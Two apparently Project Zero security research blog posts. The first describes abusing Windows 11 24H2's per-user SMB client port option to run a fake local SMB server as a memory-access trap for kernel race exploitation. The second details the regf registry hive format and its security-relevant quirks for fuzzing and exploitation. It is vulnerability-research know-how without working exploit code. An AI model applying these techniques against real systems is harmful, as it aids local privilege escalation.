    Back in 2021 I wrote a blog post about various ways you can build a virtual memory access trap primitive on Windows. The goal was to cause a reader or writer of a virtual memory address to halt for a significant (e.g. 1 or more seconds) amount of time, generally for the purpose of exploiting TOCTOU memory access bugs in the kernel.

    The solutions proposed in the blog post were to either map an SMB file on a remote server, or abuse the Cloud Filter API. This blog isn't going to provide new solutions; instead, I want to highlight a new feature of Windows 11 24H2 that introduces the ability to abuse the SMB file server directly on the local machine, no remote server required. This change also introduces the ability to locally exploit vulnerabilities of the so-called "False File Immutability" bug class.

    All Change Please

    The change was first made public, at least as far as I know, in this blog post. Microsoft's blog post described the change in Windows Insider previews; however, it has subsequently shipped in Windows 11 24H2, which is generally available.

    The TL;DR is that the SMB client on Windows now supports specifying the destination TCP port from the command line's net command. For example, you can force the SMB client to use port 12345 through the command net use \\localhost\c$ /TCPPORT:12345. Now accessing the UNC path \\localhost\c$\blah will connect through port 12345 instead of the old, fixed port of 445. This feature works for any user; administrator access is not required, as it only affects the current user's logon session.

    The problem encountered in the previous blog post was that you couldn't bind your fake SMB server to port 445 without shutting down the local SMB server. Shutting down the server can only be done as an administrator, defeating most of the point of the exploitation trick. By changing the client port to one which isn't currently in use, we can open files via our fake SMB server and perform the delay locally without needing to use the Cloud Filter API. Fortunately, this still won't allow the technique to work in a sandbox.

    Note that an administrator can disable this feature through Group Policy, but it is enabled by default and non-enterprise users are unlikely to ever change that. I personally think making it enabled by default is a mistake that will come back to cause problems for Windows going forward.

    I've updated the example fake SMB server to allow you to bind to a different port so that you can perform the attack locally. Hopefully someone finds it useful.


    The Windows Registry Adventure #5: The regf file format

    19 de Dezembro de 2024, 16:03

    Posted by Mateusz Jurczyk, Google Project Zero

    As previously mentioned in the second installment of the blog post series ("A brief history of the feature"), the binary format used to encode registry hives from Windows NT 3.1 up to the modern Windows 11 is called regf. In a way, it is quite special, because it represents a registry subtree simultaneously on disk and in memory, as opposed to most other common file formats. Documents, images, videos, etc. are generally designed to store data efficiently on disk, and they are subsequently parsed to and from different in-memory representations whenever they are read or written. This seems only natural, as offline storage and RAM come with different constraints and requirements. On disk, it is important that the data is packed as tightly as possible, while in memory, easy and efficient random access is typically prioritized. The regf format aims to bypass the reparsing step – likely to optimize the memory/disk synchronization process – and reconcile the two types of data encodings into a single one that is both relatively compact and easy to operate on at the same time. This explains, for instance, why hives don't natively support compression (but the clients are of course free to store compressed data in the registry). This unique approach comes with its own set of challenges, and has been a contributing factor in a number of historical vulnerabilities.

    Throughout the 30 years of the format's existence, Microsoft has never released its official specification. However, the data layout of all of the building blocks making up a hive (file header, bin headers, cell structures) are effectively public through the PDB symbols for the Windows kernel image (ntoskrnl.exe) available on the Microsoft Symbol Server. Furthermore, the Windows Internals book series also includes a section that delves into the specifics of the regf format (named Hive structure). Lastly, forensics experts have long expressed interest in the format for analysis purposes, resulting in the creation of several unofficial specifications based on reverse engineering, experimentation and deduction. These sources have been listed in my earlier Learning resources blog post; the two most extensive specifications of this kind can be found here and here. The intent of this post is not to repeat the information compiled in the existing resources, but rather to highlight specific parts of the format that have major relevance to security, or provide some extra context where I found it missing. A deep understanding of the low-level regf format will prove invaluable in grasping many of the higher-level concepts in the registry, as well as the technical details of software bugs discussed in future blog posts.

    The hive structure: header, bins and cells

    On the lowest level, data in hives is organized in chunks of 4 KiB (0x1000 bytes), incidentally the size of a standard memory page in the x86 architecture. The first 4 KiB always correspond to the header (also called the base block), followed by one or more bins, each being a multiple of 4 KiB in length. The header specifies general information about the hive (signature, version, etc.), while bins are an abstraction layer designed to enable the fragmentation of hive mappings in virtual memory – more on that later.

    Each bin starts with a 32-byte (0x20) header, followed by one or more cells that completely fill the bin. A cell is the smallest unit of data in a hive that has a specific purpose (e.g. describes a key, value, security descriptor, and so on). The data of a cell is preceded by a 32-bit integer specifying its size, which must be a multiple of eight (i.e. its three least significant bits are clear). Each cell is in either the free or the allocated state: a free (unused) cell is indicated by a positive size, and an allocated cell is indicated by a negative one. For example, a free cell of 32 bytes has a length marker of 0x00000020, while an active cell of 128 bytes has its size encoded as 0xFFFFFF80. This visibly demonstrates the hybrid on-disk / in-memory nature of the hive format as opposed to other classic formats, which don't intentionally leave large chunks of unused space in the files.
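    The size-marker convention can be sketched in a few lines of Python (an illustrative decoder, not kernel code): reinterpret the marker as a signed 32-bit integer, and the sign gives the state.

    ```python
    import struct

    def decode_cell_size(marker: int) -> tuple[int, str]:
        """Decode a 32-bit hive cell size marker: negative = allocated, positive = free."""
        signed, = struct.unpack("<i", struct.pack("<I", marker & 0xFFFFFFFF))
        if signed < 0:
            return -signed, "allocated"
        return signed, "free"

    decode_cell_size(0x00000020)  # -> (32, 'free')
    decode_cell_size(0xFFFFFF80)  # -> (128, 'allocated')
    ```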

    The overall file structure is illustrated in the diagram below:

    Pictorial representation of the overall file structure

    In the Windows kernel, internal functions responsible for handling these low-level hive objects (base block, bins, cells) have names starting with "Hv", for example HvCheckHive, HvpAllocateBin or HvpViewMapCleanup. This part of the registry codebase is crucial as it forms the foundation of the registry logic, enabling the Configuration Manager to easily allocate, free, and access hive cells without concerning itself with the technical details of memory management. It is also a place with significant potential for optimizations, such as the incremental logging added in Windows 8.1, or section-based registry introduced in Windows 10 April 2018 Update (RS4). Both of these mechanisms are well described in the Windows Internals 7 (Part 2) book.

    While integral to the correct functioning of the registry, hive management does not constitute a very large part of the overall registry-related codebase. In my analysis of the registry code growth shown in blog post #2, I counted 100,007 decompiled lines of code for the registry as a whole in Windows 11 kernel build 10.0.22621.2134. Out of these, only 10,407, or around 10.4%, correspond to hive memory management. This is also reflected in my findings: out of the 52 CVEs assigned by Microsoft, only two of them were directly related to a Hv* function implementation – CVE-2022-37988, a logic bug in HvReallocateCell leading to memory corruption, and CVE-2024-43452, a double-fetch while loading hives from remote network shares. This is not to say that there aren't more bugs in this mechanism, but their quantity is likely proportional to its size relative to the rest of the registry-related code.

    Let's now have a closer look at how each of the basic objects in the hive are encoded and what information they store, starting with the base block.

    Base block

    The base block is represented by a structure called _HBASE_BLOCK in the Windows Kernel, and its layout can be displayed in WinDbg:

    0: kd> dt _HBASE_BLOCK
    nt!_HBASE_BLOCK
       +0x000 Signature        : Uint4B
       +0x004 Sequence1        : Uint4B
       +0x008 Sequence2        : Uint4B
       +0x00c TimeStamp        : _LARGE_INTEGER
       +0x014 Major            : Uint4B
       +0x018 Minor            : Uint4B
       +0x01c Type             : Uint4B
       +0x020 Format           : Uint4B
       +0x024 RootCell         : Uint4B
       +0x028 Length           : Uint4B
       +0x02c Cluster          : Uint4B
       +0x030 FileName         : [64] UChar
       +0x070 RmId             : _GUID
       +0x080 LogId            : _GUID
       +0x090 Flags            : Uint4B
       +0x094 TmId             : _GUID
       +0x0a4 GuidSignature    : Uint4B
       +0x0a8 LastReorganizeTime : Uint8B
       +0x0b0 Reserved1        : [83] Uint4B
       +0x1fc CheckSum         : Uint4B
       +0x200 Reserved2        : [882] Uint4B
       +0xfc8 ThawTmId         : _GUID
       +0xfd8 ThawRmId         : _GUID
       +0xfe8 ThawLogId        : _GUID
       +0xff8 BootType         : Uint4B
       +0xffc BootRecover      : Uint4B


    The first thing that stands out is the fact that even though the base block is 4096-bytes long, it only really stores around 236 bytes of meaningful data, and the rest (the Reserved1 and Reserved2 arrays) are filled with zeros. For a detailed description of each field, I encourage you to refer to the two unofficial regf specifications mentioned earlier. In the sections below, I share additional thoughts on the usage and relevance of some of the most interesting header members.
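    As an illustration, a few of the fields discussed below can be pulled out of a hive header at the offsets shown in the WinDbg dump. This is a hypothetical parsing sketch, not code from the Windows kernel:

    ```python
    import struct

    def parse_base_block(hdr: bytes) -> dict:
        """Extract a few security-relevant _HBASE_BLOCK fields from the first
        4 KiB of a hive, at the offsets from the WinDbg dump (sketch only)."""
        assert len(hdr) >= 0x1000
        fields = {
            "Signature": hdr[0x000:0x004],                       # b"regf" for a hive
            "Sequence1": struct.unpack_from("<I", hdr, 0x004)[0],
            "Sequence2": struct.unpack_from("<I", hdr, 0x008)[0],
            "Major":     struct.unpack_from("<I", hdr, 0x014)[0],
            "Minor":     struct.unpack_from("<I", hdr, 0x018)[0],
            "RootCell":  struct.unpack_from("<I", hdr, 0x024)[0],
            "Length":    struct.unpack_from("<I", hdr, 0x028)[0],
            "CheckSum":  struct.unpack_from("<I", hdr, 0x1FC)[0],
        }
        # A mismatch between the sequence numbers means log recovery is needed.
        fields["Dirty"] = fields["Sequence1"] != fields["Sequence2"]
        return fields
    ```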

    Sequence1, Sequence2

    These 32-bit numbers are updated by the kernel during registry write operations to keep track of the consistency state of the hive. If the two values are equal during loading, the hive is in a "clean" state and doesn't require any kind of recovery. If they differ, this indicates that not all pending changes have been fully committed to the primary hive file, and additional modifications must be applied based on the accompanying .LOG/.LOG1/.LOG2 files. From a security point of view, manually controlling these fields may be useful in ensuring that the log recovery logic (HvAnalyzeLogFiles, HvpPerformLogFileRecovery and related functions) gets executed by the kernel. This is what I did when crafting the proof-of-concept files for CVE-2023-35386 and CVE-2023-38154.

    Major, Minor

    These are some of the most consequential fields in the header: they represent the major and minor version of the hive. The only valid major version is 1, while the minor version has been historically an integer between 0 and 6. Here is an overview of the different 1.x versions in existence:

    Version   Year   Introduced in                   New features
    -------   ----   -----------------------------   -----------------
    1.0       1992   Windows NT 3.1 Pre-Release      Initial format
    1.1       1993   Windows NT 3.1
    1.2       1994   Windows NT 3.5                  Predefined keys
    1.3       1995   Windows NT 4.0                  Fast leaves
    1.4       2000   Windows Whistler Beta 1         Big value support
    1.5       2001   Windows XP                      Hash leaves
    1.6       2016   Windows 10 Anniversary Update   Layered keys

    The later versions draw extensively on the earlier ones both conceptually and in terms of the actual implementation – there are non-trivial portions of code in Windows NT 3.1 Beta that are used to this day in the latest Windows 11. But when it comes to pure binary compatibility, versions 1.0 to 1.2 differ too much from the newer ones and have long been considered obsolete. This leaves us with versions ≥ 1.3, which are all cross-compatible and can be used freely on the current systems. Within this group, version 1.4 was an intermediate step in the development of the format, observed only in beta releases of Windows XP (codenamed Whistler). The other three are all in active use, and can be found in a default installation of Windows 10 and 11:

    • 1.3: encodes volatile hives (the root hive, HKLM\HARDWARE), the BCD hive (HKLM\BCD00000000), the user classes hives (HKU\<SID>_Classes), and some application hives (backed by settings.dat).
    • 1.5: encodes a majority of the system hives in HKLM (SYSTEM, SOFTWARE, SECURITY, SAM, DRIVERS), all user hives (HKU\<SID>), and most application hives (backed by ActivationStore.dat).
    • 1.6: encodes all differencing hives, i.e. hives used by processes running inside Application and Server Silos, mounted under \Registry\WC.

    It is worth noting that the hive version is supposed to be indicative of the features used inside; for example, only hives with versions ≥1.4 should use big values (values longer than 1 MiB), only hives with versions ≥1.5 should use hash leaves, etc. However, this is not actually enforced when loading a hive, and newer features being used in older hives will work completely fine. This behavior may become a problem if any part of the registry code makes any assumptions about the structure of the hive based solely on its version. One example of such a vulnerability was CVE-2022-38037, caused by the fact that the CmpSplitLeaf kernel function determined the format of a subkey list based on the hive version and not the binary representation of the list itself. In general, when writing a registry-specific fuzzer, it might be a good idea to flip the minor version between 3-6 to increase the chances of hitting some interesting corner cases related to version handling.

    As a last note, the version number is internally converted to a single 32-bit integer stored in the _HHIVE.Version structure member using the following formula: Minor+(Major*0x1000)-0x1000. In the typical case where the major version is 1, the last two components cancel each other out, e.g. version 1.5 becomes simply "5". This would be fine, if not for the fact that a major version of 0 is also allowed by HvpGetHiveHeader, in which case the minor version can be any value greater or equal to 3. Furthermore, if the kernel enters the header recovery path (because the hive header is corrupted and needs to be recovered from a .LOG file), then one can set the major/minor fields to completely arbitrary values and they will be accepted, as HvAnalyzeLogFiles doesn't perform the same strict checks that HvpGetHiveHeader does. Consequently, it becomes possible to spoof the version saved in _HHIVE.Version and have it take virtually any value in the 32-bit range, but I haven't found any security implications of this behavior, and I'm sharing it simply as a curiosity.
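    The packing formula can be demonstrated directly (a toy sketch; the odd result for a major version of 0 illustrates the underflow that makes the spoofing behavior possible):

    ```python
    def pack_hive_version(major: int, minor: int) -> int:
        """Compute the 32-bit _HHIVE.Version value: Minor+(Major*0x1000)-0x1000."""
        return (minor + major * 0x1000 - 0x1000) & 0xFFFFFFFF

    pack_hive_version(1, 5)  # -> 5: the major-version terms cancel out
    pack_hive_version(0, 3)  # -> 0xFFFFF003: a major version of 0 underflows
    ```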

    RootCell

    This is the cell index (offset in the hive file) of the root key, which marks a starting point for the Configuration Manager to parse the hive tree. The root cell is special in many respects: it is the only one in a hive that doesn't have a parent, it cannot be deleted or renamed, its name is unused (it is instead referenced by the name of its mount point), and its security descriptor is treated as the head of the security descriptor linked list. While the RootCell member itself has not been directly involved in any bugs I am aware of, it is worth keeping its special properties in mind when doing registry security research.

    Length

    Specifies the cumulative size of all bins in the hive, i.e. its file size minus 4096 (the size of the header). It is limited to 0x7FFFE000, which reflects the ~2 GiB capacity of the hive stable storage (the part of the hive that resides on disk). Combined with another ~2 GiB of volatile space (in-memory hive data that gets erased on reboot), we get a total maximum size of around 4 GiB when both types of storage space are completely maxed out. Incidentally, that's the same range as a single 32-bit cell index can address.

    Flags

    There are currently only two supported hive flags: 0x1, which indicates whether there are any pending transactions involving the hive, and 0x2, which expresses whether the hive is differencing and contains layered keys or not. The latter flag is typically set when the hive version is 1.6.

    LastReorganizeTime

    In order to address the problem of accumulating fragmentation over time, Windows 8.1 introduced a new mechanism to both shrink and optimize hives during load called reorganization. It happens automatically if the last reorganization took place more than seven days ago and the fragmentation rate of the hive is greater than 1 MiB. Reorganization achieves its goals by starting off with an empty hive and copying all existing keys recursively, taking into account which ones have been used during boot, during system runtime, and not at all since the last reorganization. The end result is that the hive becomes more packed, thanks to the elimination of free cells taking up unnecessary space, and more efficient to operate on, because the "hot" keys are grouped closer together.

    As the name suggests, the LastReorganizeTime member stores the timestamp of the last time a successful reorganization took place. From an attacker's perspective, it can be adjusted to control the behavior of the internal CmpReorganizeHive function and deterministically trigger the reorganization or skip it, depending on the desired end result. In addition to indicating a timestamp, the LastReorganizeTime field may also be equal to one of two special marker values: 0x1 to have the hive unconditionally reorganized on the next load, and 0x2 to clear the access bits on all the keys in the hive, i.e. reset the key usage information that has been collected so far.

    CheckSum

    The CheckSum field at offset 0x1FC stores the checksum of the first 508 bytes of the header (i.e. all data prior to this field), and is simply a 32-bit XOR of the header data treated as a series of 127 consecutive DWORDs. If the computed value is equal to 0xFFFFFFFF (-1), then the checksum is set to 0xFFFFFFFE (-2), and if the computed value is 0x0, then the checksum is 0x1. This means that 0 (all bits clear) and -1 (all bits set) are never valid checksum values. If you wish to examine the kernel implementation of the algorithm, you can find it in the internal HvpHeaderCheckSum function.

    The checksum is particularly important when making changes to existing hives, either for experimentation or during fuzzing. If any data within the first 508 bytes of the file is modified, the checksum needs to be adjusted accordingly. Otherwise, the system will reject the file early in the loading process with the STATUS_REGISTRY_CORRUPT error code, and none of the deeper code paths will be exercised. Therefore, fixing up the checksum is the bare minimum a hive fuzzer should do to maximize its chances of success.
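    Based on the description above, the fix-up step can be sketched in Python (a reimplementation for experimentation/fuzzing purposes, not the kernel's HvpHeaderCheckSum itself):

    ```python
    import struct

    def regf_header_checksum(hdr: bytes) -> int:
        """XOR the first 508 bytes of the base block as 127 little-endian DWORDs,
        applying the two special cases described above."""
        csum = 0
        for (dword,) in struct.iter_unpack("<I", hdr[:508]):
            csum ^= dword
        if csum == 0xFFFFFFFF:   # all bits set is never a valid checksum
            return 0xFFFFFFFE
        if csum == 0:            # neither is all bits clear
            return 0x1
        return csum
    ```

    A fuzzer would write this value back at offset 0x1FC after mutating the header, so the hive passes the early STATUS_REGISTRY_CORRUPT check.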

    Other fields

    There are several other pieces of information in the header that carry some value, more so in the context of digital forensics and incident response than strictly low-level system security. For example, "Signature" identifies the file as a regf hive and may make it easier to identify the format in raw memory/disk dumps, while "TimeStamp" indicates the last time the hive has been written to, which can be critical for establishing a timeline of events during an investigation. Furthermore, the Offline Registry Library (offreg.dll) leaves further traces in the generated hive files: a 4-byte "OfRg" identifier at offset 0xB0 (nominally the Reserved1 field) and a serialization timestamp at offset 0x200 (nominally Reserved2). For more information about the meaning and usefulness of each part of the header, please refer to one of the unofficial format specifications.

    Bins

    Bins in registry hives are a simple organizational concept used to split a potentially large hive into smaller chunks that can be mapped in memory independently of each other. Each of them starts with a 32-byte _HBIN structure:

    0: kd> dt _HBIN
    nt!_HBIN
       +0x000 Signature        : Uint4B
       +0x004 FileOffset       : Uint4B
       +0x008 Size             : Uint4B
       +0x00c Reserved1        : [2] Uint4B
       +0x014 TimeStamp        : _LARGE_INTEGER
       +0x01c Spare            : Uint4B


    The four meaningful fields here are the four-byte signature ("hbin"), offset of the bin in the file, size of the bin, and a timestamp. Among them, the signature is a constant, the file size is sanitized early in the hive process and effectively also a constant, and the timestamp is not security-relevant. This leaves us with the size as the most interesting part of the header. The only constraints for it is that it must be a multiple of 0x1000, and the sum of the offset and size must not exceed the total length of the hive (_HBASE_BLOCK.Length). At runtime, bins are allocated as the smallest 4 KiB-aligned regions that fit a cell of the requested size, so in practice, they typically end up being between 4-16 KiB in size, but they may organically be as long as 1 MiB. While longer bins cannot be produced by the Windows kernel, there is nothing preventing a specially crafted hive from being loaded in the system with a bin of ~2 GiB in size, the maximum length of a hive as a whole. This behavior doesn't seem to have any direct security implications, but more generally, it is a great example of how the hive states written by Windows are a strictly smaller subset of the set of states accepted as valid during loading:

    Image showing that the states written by the kernel are a subset of states accepted by the hive loader
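    The constraints on a bin header described above translate into a short validation routine (an illustrative sketch with hypothetical error handling, not loader code):

    ```python
    import struct

    def check_bin_header(bin_hdr: bytes, hive_length: int) -> None:
        """Validate an _HBIN header: 'hbin' signature, size a multiple of 4 KiB,
        and offset+size within the hive's _HBASE_BLOCK.Length (sketch only)."""
        signature, file_offset, size = struct.unpack_from("<4sII", bin_hdr, 0)
        if signature != b"hbin":
            raise ValueError("bad bin signature")
        if size == 0 or size % 0x1000 != 0:
            raise ValueError("bin size not a non-zero multiple of 4 KiB")
        if file_offset + size > hive_length:
            raise ValueError("bin extends past the end of the hive")
    ```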

    Cells

    Cells are the smallest unit of data in registry hives – they're continuous buffers of arbitrary lengths. They do not have a dedicated header structure like _HBASE_BLOCK or _HBIN, but instead, each cell simply consists of a signed 32-bit size marker followed by the cell's data. The size field is subject to the following constraints:

    • A cell may be in one of two states – allocated and free – as indicated by the sign of the size value. Positive values are used for free cells, and negative ones for allocated cells.
    • The size value accounts for the four bytes occupied by itself.
    • The size value must be a multiple of 8 (i.e. have its three lowest bits set to zero). If a cell with a size not divisible by 8 is allocated at runtime, it is aligned up to the next multiple of 8, potentially leaving some unused padding bytes at the end of the cell.
    • The sum of all consecutive cells in a bin must be equal to the length of the bin. In other words, the bin header followed by tightly packed cells (with no gaps) completely fill the bin space. If the hive loader detects that this is not the case, it forcefully fixes it by creating a single free cell spanning from the failing point up to the end of the bin. This invariant must subsequently hold for the entire time the hive is loaded in the system.
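    The invariants above suggest a simple cell walker. The following sketch (illustrative, not kernel code) iterates the cells of one bin and rejects any marker that would violate them:

    ```python
    import struct

    BIN_HEADER_SIZE = 0x20  # the 32-byte _HBIN header precedes the first cell

    def walk_cells(bin_data: bytes) -> list[tuple[int, str]]:
        """Walk the cells of a single bin, returning (size, state) pairs.
        The cells must tightly pack the bin from the header to its end."""
        cells, offset = [], BIN_HEADER_SIZE
        while offset < len(bin_data):
            marker, = struct.unpack_from("<i", bin_data, offset)
            size = abs(marker)
            if size < 8 or size % 8 or offset + size > len(bin_data):
                raise ValueError("corrupt cell at offset %#x" % offset)
            cells.append((size, "free" if marker > 0 else "allocated"))
            offset += size  # cells are contiguous, so the next one starts here
        return cells
    ```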

    If cells remind you of heap allocations requested via malloc or HeapAlloc, it is not just your impression. There are many parallels to be drawn between hive cells and heap buffers: both can be allocated and freed, have arbitrary sizes and store a mixture of well-formatted structures and free-form user data. However, there are some significant differences too: heap implementations have evolved to include anti-exploitation mitigations like layout randomization, heap cookies for metadata protection, double-free detection and miscellaneous other consistency checks. On the other hand, hives have none of that: the allocation logic is fully deterministic and doesn't involve any randomness, there is no metadata protection, and generally little to no runtime checks. This is likely caused by the fact that heap chunks have been targets of memory corruption for many decades, whereas the registry was designed with the assumption that once loaded, the hive structure is always internally consistent and intra-hive memory corruption may never occur. This makes the exploitation of certain registry bugs particularly convenient and reliable, as I will demonstrate in future blog posts.

    Like a typical memory allocator interface, cells have alloc, realloc, and free functions. Specifically, the internal routines responsible for these tasks in the Windows kernel are HvAllocateCell, HvReallocateCell and HvFreeCell, and reverse-engineering them allowed me to uncover some helpful insights. For instance, I have found that HvAllocateCell and HvReallocateCell reject allocation sizes larger than 1 MiB, and for requests above 16 KiB, they round the size up to the next power of two. Meanwhile, HvFreeCell performs coalescing of free cells, so there should never be two adjacent free cells in an organically created hive. These are some further examples of behavior that is guaranteed on output, but not enforced on input. This is a prevalent pattern in the Windows registry, and I found it useful to keep track of such primitives in my research, even if they didn't seem particularly useful at the time. Thanks to this, I have discovered at least three security bugs closely related to this phenomenon, including one in the interactions between HvReallocateCell and its callers (CVE-2022-37988).
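    The sizing policy can be approximated as follows. This is a sketch inferred from the behavior described above, not a byte-exact reimplementation of HvAllocateCell (details such as header accounting may differ):

```python
def round_allocation_size(size: int) -> int:
    """Approximate HvAllocateCell's size policy as described in the text:
    reject requests over 1 MiB, round requests above 16 KiB up to the next
    power of two, and align everything to the 8-byte cell granularity."""
    if size > 0x100000:          # 1 MiB hard cap
        raise ValueError("cell too large")
    size = (size + 7) & ~7       # 8-byte cell granularity
    if size > 0x4000:            # above 16 KiB: next power of two
        size = 1 << (size - 1).bit_length()
    return size

print(round_allocation_size(100))         # 104
print(hex(round_allocation_size(0x5000))) # 0x8000
```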

    Cell indexes

    If we equate cells to heap buffers in user-mode applications, then cell indexes would be pointers. Cells rely on these indexes to interrelate within the registry's complex structure. For example, keys reference security descriptors (to control access), their parent key (to navigate the hierarchy), and optionally the list of subkeys and list of values (to organize data). The list of values references specific value records, which in turn reference the actual data backing cells, and so on. This intricate web of relationships is no different from any semi-complex object in a C/C++ program, where pointers link various data structures.

    On disk, cell indexes are nothing special: they are simply 32-bit offsets from the start of the hive data (after the 0x1000 byte header), which is a typical way of implementing cross-object references in most file formats. However, it's important to note that a cell index must point to the beginning of a cell (not inside it or in the bin header), and the cell must be in the allocated state – otherwise, the index is considered invalid. So when implementing a read-only regf parser operating on the hive as a contiguous memory block, translating cell indexes is as simple as adding them to the starting address of the hive in memory.
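    For this simple read-only case, cell index translation might look like the sketch below, which treats the hive file as one contiguous buffer and reuses the sign convention from the previous section to reject indexes pointing at free cells:

```python
import struct

HCELL_NIL = 0xFFFFFFFF
BASE_BLOCK_SIZE = 0x1000  # the header that cell indexes are relative to

def resolve_cell(hive_file: bytes, index: int) -> bytes:
    """Translate a cell index in a hive file loaded as one contiguous
    buffer: the index is simply an offset into the hive data, which starts
    after the 0x1000-byte base block. Returns the cell's payload, skipping
    the 4-byte size prefix."""
    if index == HCELL_NIL:
        raise ValueError("HCELL_NIL: no cell")
    offset = BASE_BLOCK_SIZE + index
    (size,) = struct.unpack_from("<i", hive_file, offset)
    if size >= 0:
        raise ValueError("cell index points at a free cell")
    return hive_file[offset + 4 : offset - size]  # -size = |size|, incl. prefix

# Tiny fake hive: an empty base block, then one allocated 16-byte cell at index 0.
hive = bytearray(0x1010)
struct.pack_into("<i12s", hive, 0x1000, -16, b"hello world!")
print(resolve_cell(bytes(hive), 0))  # b'hello world!'
```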

    When a hive is loaded in Windows, the management of cell indexes becomes more complex. Hives at rest have a maximum size of 2 GiB, and all of their data is considered stable (persistently stored). On the other hand, an active hive also gains an additional 2 GiB of volatile storage, used for temporary keys and values that reside only in memory. These temporary entries exist only while the hive is loaded (or until the system is shut down) and can be created by calling RegCreateKeyEx with the REG_OPTION_VOLATILE flag, which designates the key as temporary. To distinguish between these two storage spaces in a cell index, the highest bit serves as an indicator: 0x0 for stable space and 0x1 for the volatile one, resulting in large index values (greater than 0x80000000) that readily identify volatile cells.

    But an even bigger complication stems from the fact that hives can shrink and grow at runtime, so it is largely impractical to have them mapped as a single block of memory. To efficiently handle modifications to the registry, Windows maps hives in smaller chunks, which makes the previous method of translating cell indexes obsolete, and necessitates a more sophisticated solution. The answer to this problem is cell maps – pagetable-like structures that divide the 32-bit hive address space into smaller, nested layers, indexed by the respective 1, 10, 9, and 12-bit parts of the 32-bit cell index. Cell maps in the Windows kernel utilize a hierarchical structure consisting of storage arrays, directories, tables, and leaf entries, all defined within the ntoskrnl.exe PDB symbols (the relevant structures are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY). The layout of cell indexes and cell maps is illustrated in the diagram below, based on a similar diagram in the Windows Internals book, which itself draws from Mark Russinovich's 1999 article, Inside the Registry:
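    The bit layout of a cell index can be sketched as follows – a parsing illustration of the 1/10/9/12-bit split described above, not kernel code:

```python
def split_cell_index(index: int):
    """Split a 32-bit cell index into the four fields used by the cell map:
    1 storage bit, 10 directory bits, 9 table bits, and a 12-bit offset
    within the 4 KiB block."""
    storage   = (index >> 31) & 0x1    # 0 = stable, 1 = volatile
    directory = (index >> 21) & 0x3FF  # 10-bit directory index
    table     = (index >> 12) & 0x1FF  # 9-bit table index
    offset    = index & 0xFFF          # 12-bit offset within the block
    return storage, directory, table, offset

# A stable-space index and its volatile counterpart:
print(split_cell_index(0x00001020))  # (0, 0, 1, 32)
print(split_cell_index(0x80001020))  # (1, 0, 1, 32)
```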

    Diagram illustrating the layout of cell indexes and cell maps

    Cell indexes play a central role in core registry operations, such as creating, reading, updating, and deleting keys and values. The internal kernel function responsible for traversing the cell map and translating cell indexes into virtual addresses is HvpGetCellPaged. In normal conditions, the indexes stay within the bounds of the storage space size (_HHIVE.Storage[x].Length), so HvpGetCellPaged assumes their validity and doesn't perform any additional bounds checking. However, certain memory corruption vulnerabilities may allow attackers to manipulate these cell indexes at runtime. Crucially, I discovered that out-of-bounds cell indexes can serve as a powerful primitive for exploit development, enabling the construction of proof-of-concept exploits that achieve local elevation of privileges. I will elaborate further on this in future exploit-focused blog posts.

    As a last note, the special marker of -1 (0xFFFFFFFF) is used to represent non-existent cells, and can be found in cell indexes pointing at optional data that doesn't exist – basically a hive equivalent of a NULL pointer. The internal name for the constant in the Windows kernel is HCELL_NIL, and under normal circumstances, it should never be passed directly to HvpGetCellPaged. Doing so without guaranteeing that the cell index is valid first would constitute a bug in the Windows kernel (for example, see CVE-2023-35357 or CVE-2023-35358).

    Cell types

    Now that we have familiarized ourselves with the low-level structure of hives that facilitates their efficient management in memory, let's go a little further and learn about the types of information stored in the cells. These are the objects that actually define the registry tree and all of its properties: keys, values, security descriptors, etc. The first subsection provides a general overview of the various cell types found within a hive and the relations between them. The second one goes into the intricate details of their format and usage within the Windows kernel, uncovering obscure implementation details rarely documented elsewhere.

    Overview of cell types

    Registry hives utilize only seven distinct cell types to represent the various data structures within the registry, as outlined below:

    1. Key Node: Represents a single registry key and its associated metadata. It is defined by the _CM_KEY_NODE structure and contains references to other cells, including its parent key, security descriptor, class data (optional), and lists of subkeys (stable and volatile) and values (optional).
    2. Subkey Index: A variable-length list of key node cell indexes, representing the subkeys of a specific key. For performance reasons, there are four variations of subkey indexes: index leaf, fast leaf, hash leaf, and root index. All are represented by the _CM_KEY_INDEX structure.
    3. Security Descriptor: Defines access control information for one or more keys, specifically a security descriptor in a self-relative format. Represented by the _CM_KEY_SECURITY structure, it is the only cell type that can be referenced from multiple key nodes and is therefore reference-counted. It also contains links to the next and previous security descriptors in the hive.
    4. Key Value: Defines a single value associated with a key, including its name, type, data length, and a reference to the cell containing the actual data. It is represented by the _CM_KEY_VALUE structure.
    5. Big Data: Used to store value data exceeding 16,344 bytes (~16 KiB) in hive versions 1.4 and later. The data is divided into chunks of up to 16 KiB each, allowing for values approaching 1 GiB. The _CM_BIG_DATA structure represents this cell type, containing the number of chunks and a reference to the list of chunk cells.
    6. Value List and Chunk List Cells: These cells are simple arrays of 32-bit cell indexes. They are used to store lists of values associated with a key and lists of chunks for large value data.
    7. Data Cells: These cells store the raw data associated with keys and values. They hold the optional class data for a key, the complete data for small values (up to 1 MiB in older hives, ~16 KiB in newer hives), and the individual chunks of large values.
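    As a quick worked example, the chunking arithmetic for big data values looks like this. The 16,344-byte per-chunk capacity matches the threshold quoted above and the figure given in the unofficial regf specification, but should be treated as an assumption:

```python
import math

CM_KEY_VALUE_BIG = 16344  # values longer than this use big data cells
BIG_DATA_CHUNK   = 16344  # assumed per-chunk capacity (per the regf spec)

def chunks_needed(data_length: int) -> int:
    """How many chunk cells a big-data value of the given length occupies."""
    return math.ceil(data_length / BIG_DATA_CHUNK)

print(chunks_needed(16345))    # 2
print(chunks_needed(1 << 20))  # 65
```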

    The diagram below illustrates the relationships between these cell types:

    Diagram illustrating the relationships between these cell types

    Deep dive into each cell type

    Now that we know the general purpose of each cell type, it's a good time to dig a little deeper into each of them. This lets us explore both their implementation details, as well as the spirit behind these objects and how they interact with each other in a real-life environment. I have tried my best to avoid repeating the existing unofficial specifications and instead only focus on the security-relevant and sparsely documented aspects of the format, but if any redundant information makes it into this section, please bear with me. 🙂

    Key nodes

    As keys are the most important part of the registry, key nodes are the most important and complex of all cell types. When dumped in WinDbg, the layout of the _CM_KEY_NODE structure is as follows:

    0: kd> dt _CM_KEY_NODE /r
    nt!_CM_KEY_NODE
       +0x000 Signature        : Uint2B
       +0x002 Flags            : Uint2B
       +0x004 LastWriteTime    : _LARGE_INTEGER
       +0x00c AccessBits       : UChar
       +0x00d LayerSemantics   : Pos 0, 2 Bits
       +0x00d Spare1           : Pos 2, 5 Bits
       +0x00d InheritClass     : Pos 7, 1 Bit
       +0x00e Spare2           : Uint2B
       +0x010 Parent           : Uint4B
